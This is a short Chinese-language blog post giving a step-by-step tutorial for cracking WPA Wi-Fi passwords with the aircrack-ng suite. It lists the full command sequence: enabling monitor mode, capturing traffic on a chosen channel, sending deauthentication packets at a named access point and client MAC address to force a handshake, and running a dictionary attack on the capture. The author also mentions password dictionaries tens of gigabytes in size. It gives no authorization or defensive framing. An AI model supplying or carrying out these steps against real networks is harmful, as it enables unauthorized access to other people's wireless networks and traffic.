wi-fi
你通过手上现有的接收端,去搜索到其他他送端发送的信号,拿到手上之后,利用手上的工具和命令讲获取到的信号破解掉
需要一个接受段,可以接受到发送的信号
无线的加密类型
杂合模式是为了手机到更多的信号
airmon-ng start wlan0 up
ifconfig 看到mon0 说明开启混杂模式成功
看开启了混杂模式的网卡收集到了哪些信号
airodump-ng mon0
<length: 8> 表示有8个字节 隐藏了ssid 这种的依然能够破解,以后说明、
BSSID:MAC地址
CH :表示信道
以bdqntest第一个信道为例
airodump-ng -w test.cap -c 6 mon0
-w 保存的数据包路径
-c 指定6信道
输入命令后如图下面的第二块也有一个BSSID,还有一个STATION(跟的是正在连接的客户端的MAC地址)
aireplay-ng -0 10 -a 52:BD:5F:1F:07:98 -c 0c:60:76:2F:57:26 mon0
-0 发包次数,即进行注入攻击
-a ap的mac
-c 客户端的mac
开一个窗口慢慢抓的,一边抓,一边打
ls 可以看到 每次抓到的包,第一次命名成01第二回命名成02。。。。。
攻击到出正在抓包的那个窗口的右上角出现wpa handshake:52:BD:5F:1F:07:98 表示抓握手包成功
aircrack-ng -w 1.txt test*.cap
-w 指定字典
后面指定攻击的包文件
输入9回车
然后就开始破解了,字典要给力,我这里的都搞的几十G的密码字典
本文出自 “St1sk” 博客,请务必保留此出处http://st1sk.blog.51cto.com/9837690/1671836
原文地址:http://st1sk.blog.51cto.com/9837690/1671836